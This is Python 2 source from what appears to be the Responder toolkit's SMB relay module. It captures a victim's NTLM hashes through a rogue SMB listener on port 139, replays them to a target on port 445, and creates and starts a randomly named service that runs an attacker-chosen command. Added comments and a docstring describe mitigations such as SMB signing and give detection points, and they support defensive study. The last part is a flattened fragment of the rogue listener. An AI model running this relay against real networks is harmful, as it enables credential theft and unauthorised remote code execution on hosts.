def RunRelay(host, Command,Domain):
    """Forward a captured SMB authentication to ``host`` and try to start a service there.

    Flow as written below: SMB1 Negotiate to host:445, hand the server's challenge key to
    SmbRogueSrv139() (defined elsewhere on this file) which returns the captured credential
    material, replay it in a Session Setup AndX, then, if the session is accepted, issue the
    DCE/RPC SVCCTL calls (OpenSCManagerW, CreateService, OpenService, StartService) through
    SMB Write/Read AndX on the file id returned by NT Create AndX.

    Args:
        host: target address; every exchange goes to TCP 445.
        Command: passed unchanged to SMBDCESVCCTLCreateService as BinCMD.
        Domain: domain used for the relayed logon; when None the domain captured with the
            credentials (OriginalDomain) is used instead.

    Returns:
        True when the StartService read answer starts with "\\x2e\\x00", False when that last
        read returns anything else, and implicitly None on every other exit path (nothing
        captured, session already recorded in SMBRelay-Session.txt, or any earlier step
        not answering with the expected status). Callers must not treat None as False.

    Review notes (defender's view):
      - The code's own failure messages name the controls that stop it: mandatory SMB signing
        makes the relayed session unusable at NT Create AndX, and a non-admin user cannot open
        the Service Control Manager (ERROR_ACCESS_DENIED checks below). Enforcing SMB signing on
        every host, not only domain controllers, is the mitigation this function is sensitive to.
      - A successful run installs and starts a service whose name is 11 random letters and
        whose display name is 16 random letters; service-installation audit events on the
        target are the detection point. FileChars (random 6 letters + '.bat') is computed but
        never used, so no .bat artefact is created by this code.
      - This is Python 2 code: ``print`` statements, and ``s.recv()`` returns ``str`` so the
        byte-string comparisons work. Under Python 3 ``bytes == str`` is always False and none
        of the status branches would match.
      - The socket has no timeout and is never closed; any recv() may block indefinitely and
        the descriptor leaks on every return path.
    """
    Target = host
    CMD = Command
    print "Target is running: ", RunSmbFinger((host, 445))
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, 445))
    # SMB1 Negotiate (cmd 0x72). SMBHeader/SMBNego/longueur are defined elsewhere in the file.
    h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x03\xc7",pid="\xff\xfe", tid="\xff\xff")
    n = SMBNego(Data = SMBNegoData())
    n.calculate()
    packet0 = str(h)+str(n)
    buffer0 = longueur(packet0)+packet0
    s.send(buffer0)
    data = s.recv(2048)
    # Challenge key and the server's domain/machine name are lifted from the Negotiate reply
    # and handed to the rogue 139 listener so the client's response matches this challenge.
    Key = ParseAnswerKey(data,host)
    DomainMachineName = ParseDomain(data)
    # Every status check below slices data[8:10]: in the SMB1 header byte 8 is the command
    # and byte 9 the first byte of the NT status, so "\x72\x00" means "Negotiate, status 0x..00".
    if data[8:10] == "\x72\x00":
        try:
            # Blocks until SmbRogueSrv139() (elsewhere in the file) returns captured material
            # or None. Tuple layout is fixed by the unpack on the next line.
            a = SmbRogueSrv139(Key,Target,DomainMachineName)
            if a is not None:
                LMHash,NTHash,Username,OriginalDomain, CLIENTIP = a
                if Domain is None:
                    Domain = OriginalDomain
                # ReadData() (elsewhere) presumably reports whether this Target/Username/CMD
                # combination was already attempted; if so the session is not replayed and
                # data still holds the Negotiate reply, so no later branch matches.
                if ReadData("SMBRelay-Session.txt", Target, Username, CMD):
                    pass
                else:
                    # Session Setup AndX (cmd 0x73) carrying the captured hashes verbatim.
                    head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x03\xc8",pid="\xff\xfe",mid="\x01\x00")
                    t = SMBSessionTreeData(AnsiPasswd=LMHash,UnicodePasswd=NTHash,Username=Username,Domain=Domain,Targ=Target)
                    t.calculate()
                    packet0 = str(head)+str(t)
                    buffer1 = longueur(packet0)+packet0
                    s.send(buffer1)
                    data = s.recv(2048)
        except:
            # Bare except that re-raises immediately; the assignment after it is unreachable.
            raise
            a = None
    # CLIENTIP and Username are bound only inside the `a is not None` branch above. The two
    # logging branches below can only be reached when that branch ran (otherwise data is still
    # the 0x72 Negotiate reply), but nothing here enforces that; keep in mind if this is edited.
    if data[8:10] == "\x73\x6d":
        # Status low byte 0x6d: logon failure. Execution continues; no return here.
        print "[+] Relay failed, auth denied. This user doesn't have an account on this target."
        Logs.info(CLIENTIP+":"+Username)
    if data[8:10] == "\x73\x0d":
        # Status low byte 0x0d: invalid parameter. Execution continues; no return here.
        print "[+] Relay failed, SessionSetupAndX returned invalid parameter. It's most likely because both client and server are >=Windows Vista"
        Logs.info(CLIENTIP+":"+Username)
    ## NtCreateAndx
    if data[8:10] == "\x73\x00":
        # Session accepted. From here on pid/uid/tid are echoed back from each reply at fixed
        # header offsets; SMBNTCreateData() (elsewhere) presumably opens the svcctl pipe --
        # its body is not on this page.
        print "[+] Authenticated, trying to PSexec on target !"
        head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x03\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
        t = SMBNTCreateData()
        t.calculate()
        packet0 = str(head)+str(t)
        buffer1 = longueur(packet0)+packet0
        s.send(buffer1)
        data = s.recv(2048)
        ## Fail Handling.
        if data[8:10] == "\xa2\x22":
            # Status low byte 0x22 (access denied) on NT Create AndX. This is where a server
            # that requires SMB signing rejects the unsigned, relayed session. No return;
            # the function simply falls through and ends up returning None.
            print "[+] Exploit failed, NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation?"
        ## DCE/RPC Write.
        if data[8:10] == "\xa2\x00":
            # DCE/RPC bind written to the pipe (Write AndX, cmd 0x2f). f is the FID taken from
            # the NT Create reply and reused for every Write/Read below.
            head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
            x = SMBDCEData()
            x.calculate()
            f = data[42:44]
            t = SMBWriteData(FID=f,Data=x)
            t.calculate()
            packet0 = str(head)+str(t)
            buffer1 = longueur(packet0)+packet0
            s.send(buffer1)
            data = s.recv(2048)
            ## DCE/RPC Read.
            if data[8:10] == "\x2f\x00":
                # Read AndX (cmd 0x2e) to collect the bind acknowledgement.
                head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x05\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                t = SMBReadData(FID=f)
                t.calculate()
                packet0 = str(head)+str(t)
                buffer1 = longueur(packet0)+packet0
                s.send(buffer1)
                data = s.recv(2048)
                ## DCE/RPC SVCCTLOpenManagerW.
                if data[8:10] == "\x2e\x00":
                    # OpenSCManagerW request; SMBDCEPacketData's default Opnum is not visible here.
                    head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                    w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x03\x00")
                    w.calculate()
                    x = SMBDCEPacketData(Data=w)
                    x.calculate()
                    t = SMBWriteData(FID=f,Data=x)
                    t.calculate()
                    packet0 = str(head)+str(t)
                    buffer1 = longueur(packet0)+packet0
                    s.send(buffer1)
                    data = s.recv(2048)
                    ## DCE/RPC Read Answer.
                    if data[8:10] == "\x2f\x00":
                        head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                        t = SMBReadData(FID=f)
                        t.calculate()
                        packet0 = str(head)+str(t)
                        buffer1 = longueur(packet0)+packet0
                        s.send(buffer1)
                        data = s.recv(2048)
                        ## DCE/RPC SVCCTLCreateService.
                        if data[8:10] == "\x2e\x00":
                            # Last four bytes of the read answer are treated as the RPC return
                            # code; 0x00000005 is ERROR_ACCESS_DENIED. Only a message is printed:
                            # the code still proceeds to CreateService with whatever is at
                            # data[88:108], so a non-admin relay produces further noisy failures.
                            if data[len(data)-4:] == "\x05\x00\x00\x00":
                                print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?"
                            print "[+] Creating service"
                            head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                            # Presumably the 20-byte SCM context handle at a fixed offset in the
                            # OpenSCManagerW reply -- offset is hard-coded, not parsed.
                            ContextHandler = data[88:108]
                            # Service name and display name are random ASCII letters from the
                            # non-cryptographic `random` module; these are the on-host artefacts.
                            ServiceNameChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)])
                            ServiceIDChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)])
                            # Unused: FileChars is never referenced after this line.
                            FileChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.bat'
                            # Opnum 0x000c = RCreateServiceW; CMD becomes the service binary path.
                            w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars,ReferentID="\x21\x03\x03\x00",BinCMD=CMD)
                            w.calculate()
                            x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w)
                            x.calculate()
                            t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
                            t.calculate()
                            packet0 = str(head)+str(t)
                            buffer1 = longueur(packet0)+packet0
                            s.send(buffer1)
                            data = s.recv(2048)
                            ## DCE/RPC Read Answer.
                            if data[8:10] == "\x2f\x00":
                                head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                                t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
                                t.calculate()
                                packet0 = str(head)+str(t)
                                buffer1 = longueur(packet0)+packet0
                                s.send(buffer1)
                                data = s.recv(2048)
                                ## DCE/RPC SVCCTLOpenService.
                                if data[8:10] == "\x2e\x00":
                                    # Again only a message on ERROR_ACCESS_DENIED; no return.
                                    if data[len(data)-4:] == "\x05\x00\x00\x00":
                                        print "[+] Failed to create the service"
                                    # Opnum 0x0010 = ROpenServiceW on the service just created.
                                    head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                                    w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars)
                                    w.calculate()
                                    x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
                                    x.calculate()
                                    t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
                                    t.calculate()
                                    packet0 = str(head)+str(t)
                                    buffer1 = longueur(packet0)+packet0
                                    s.send(buffer1)
                                    data = s.recv(2048)
                                    ## DCE/RPC Read Answer.
                                    if data[8:10] == "\x2f\x00":
                                        head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                                        t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
                                        t.calculate()
                                        packet0 = str(head)+str(t)
                                        buffer1 = longueur(packet0)+packet0
                                        s.send(buffer1)
                                        data = s.recv(2048)
                                        ## DCE/RPC SVCCTLStartService.
                                        if data[8:10] == "\x2e\x00":
                                            if data[len(data)-4:] == "\x05\x00\x00\x00":
                                                print "[+] Failed to open the service"
                                            # ContextHandler is overwritten with the service handle
                                            # from the OpenService reply (same fixed offset).
                                            ContextHandler = data[88:108]
                                            # Note the multiplex ids "\x0a\x00"/"\x0b\x00" are reused
                                            # from the OpenService exchange above.
                                            head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                                            # Opnum 0x0013 = RStartServiceW.
                                            w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler)
                                            x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
                                            x.calculate()
                                            t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
                                            t.calculate()
                                            packet0 = str(head)+str(t)
                                            buffer1 = longueur(packet0)+packet0
                                            s.send(buffer1)
                                            data = s.recv(2048)
                                            ## DCE/RPC Read Answer.
                                            if data[8:10] == "\x2f\x00":
                                                head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                                                t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
                                                t.calculate()
                                                packet0 = str(head)+str(t)
                                                buffer1 = longueur(packet0)+packet0
                                                s.send(buffer1)
                                                data = s.recv(2048)
                                                # "Success" here only means the Read AndX itself
                                                # returned status 0x..00; the RPC return code of
                                                # RStartServiceW is not inspected. The service
                                                # created above is never deleted by this function.
                                                if data[8:10] == "\x2e\x00":
                                                    print "[+] Command successful !"
                                                    Logs.info('Command successful:')
                                                    Logs.info(Target+","+Username+','+CMD)
                                                    return True
                                                if data[8:10] != "\x2e\x00":
                                                    return False
print '\033[31m'+'Something is already listening on TCP 139, did you set SMB = Off in Responder.conf..?\nSMB Relay will not work.'+'\033[0m' try: while True: data = conn.recv(1024) ##session request 139 if data[0] == "\x81": buffer0 = "\x82\x00\x00\x00" conn.send(buffer0) ##Negotiate proto answer. if data[8:10] == "\x72\x00": head = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x53\xc8",pid=pidcalc(data),tid=tidcalc(data)) t = SMBNegoAns(Dialect=Parse_Nego_Dialect(data),Key=key,Domain=DomainMachineName) t.calculate() packet1 = str(head)+str(t) buffer1 = longueur(packet1)+packet1 conn.send(buffer1) ##Session Setup AndX Request if data[8:10] == "\x73\x00": if Is_Anonymous(data): head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) packet1 = str(head)+str(SMBSessEmpty()) buffer1 = longueur(packet1)+packet1 conn.send(buffer1) else: head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xC0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) packet1 = str(head)+str(SMBSessEmpty())#Return login fail anyways. buffer1 = longueur(packet1)+packet1 conn.send(buffer1) Credz = ParseHash(data,addr[0],Target) return Credz